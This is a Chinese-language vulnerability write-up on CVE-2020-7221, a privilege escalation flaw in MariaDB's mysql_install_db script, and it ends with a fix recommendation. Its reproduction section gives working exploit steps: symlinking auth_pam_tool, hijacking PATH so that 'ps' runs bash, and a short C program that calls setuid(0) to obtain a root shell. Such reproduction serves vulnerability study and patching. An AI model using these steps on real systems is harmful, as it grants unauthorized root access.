(CVE-2020-7221)Mariadb 提权漏洞

一、漏洞简介

MariaDB 10.4.7到10.4.11中的mysql_install_db允许将特权从mysql用户帐户升级到root用户,因为chown和chmod的执行不安全,如对auth_pam_tool_dir / auth_pam_tool的chmod 04755的symlink攻击所证明的那样。注意:这不会影响Oracle MySQL产品,该产品以不同的方式实现mysql_install_db。

二、漏洞影响

Mariadb 10.4.7到10.4.11

三、复现过程

docker环境搭建:

  1. docker pull mariadb:10.4.8
  2. docker run -it 2ef19234ff46 /bin/bash

漏洞分析

首先定位漏洞点。

find / -name "mysql_install_db"

image

在bash脚本上下文中,如果$user被定义则能进入「配置不当」漏洞点。

chown $user "$pamtooldir/auth_pam_tool_dir"

chmod 0700 "$pamtooldir/auth_pam_tool_dir"

这里配置了auth_pam_tool_dir目录的归属权和所有权,权限归属于$user。 (这里是可控点之一)

chown 0 "$pamtooldir/auth_pam_tool_dir/auth_pam_tool" 

chmod 04755 "$pamtooldir/auth_pam_tool_dir/auth_pam_tool"

这里配置了auth_pam_tool文件为0(root)所有权,4755文件权限(4为suid权限)。想要进入这个漏洞点需要$srcdir变量值长度为0才能触发。

关于suid属性:

SUID属性一般用在可执行文件上,当用户执行该文件时,会「临时拥有该执行文件的所有者权限」。一旦程序拥有SUID权限的话,运行该程序时会以最高权限运行。

回溯 $srcdir 与 $user
  1. $user

image

在脚本传递args参数时可控制$user变量。

  1. $srcdir

image

也在初始化操作时可控制变量,初始化时为空。

那么想要进入这个漏洞点需要$srcdir为空,$user需要设置值。

结合上文描述使用此命令才能触发漏洞点:

./mysql_install_db --user=mysql

漏洞复现

寻找suid属性的程序

find /* -perm -u=s -type f 2>/dev/null

搜索到的suid属性程序「auth_pam_tool」替换成我们的恶意suid程序。

1. rm auth_pam_tool
2. ln -s /root/pwn auth_pam_tool
3. export PATH=.:$PATH
4. ln -s /bin/bash ps

编写一个具有suid权限的恶意程序:

#include <unistd.h>
#include <stdlib.h>
int main(void)
{
    setuid(0);
    setgid(0);
    system("ps");
    return 0;
}

image

切换回root,在root权限下运行mysql_install_db脚本(触发修改chmod命令)

image

再回到mysql用户权限下执行auth_pam_tool

image

提权成功。

可以看到这个漏洞是由于suid与目录权限设置不当,才导致被提权利用的风险。建议在修复中设置auth_pam_tool_dir目录权限为root所有:

root:mysql  0750 /usr/lib/mysql/plugin/auth_pam_tool_dir

参考链接

https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247486415&idx=1&sn=0e413fdfd22f21580e0c70251e53a7cb&chksm=fe7a2f57c90da64190913e4f40d5f854dcc0c794ac988ce667f1ba0d4a262575b5c4a67b65a1&mpshare=1&scene=1&srcid=&sharer_sharetime=1582037009796&sharer_shareid=346bf064ccfaeb680ec3e1af3a4fc9a8&key=36a0b0f21e7aca1c7ade662e9184d730b9617a817ebf64e5bbc6048142797fa6b31c917039b5d1308f1d16cf77ba9f43d541a1bd197ead9b66bb01969c4f1bf2c54e19862f1f9bc1f449495c27554e90&ascene=1&uin=MTU0OTU5NDkzMA%3D%3D&devicetype=Windows+10&version=62080079&lang=zh_CN&exportkey=AUm27aB0HayWjmPDBsXi7NU%3D&pass_ticket=VkgA7hk5gRtBGyr1o4%2Bh5PlNbfx095JODofk2U16AOMJewFkqv%2BeZkeziLm0G2um

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-02-19 20:55:17

results matching ""

    No results matching ""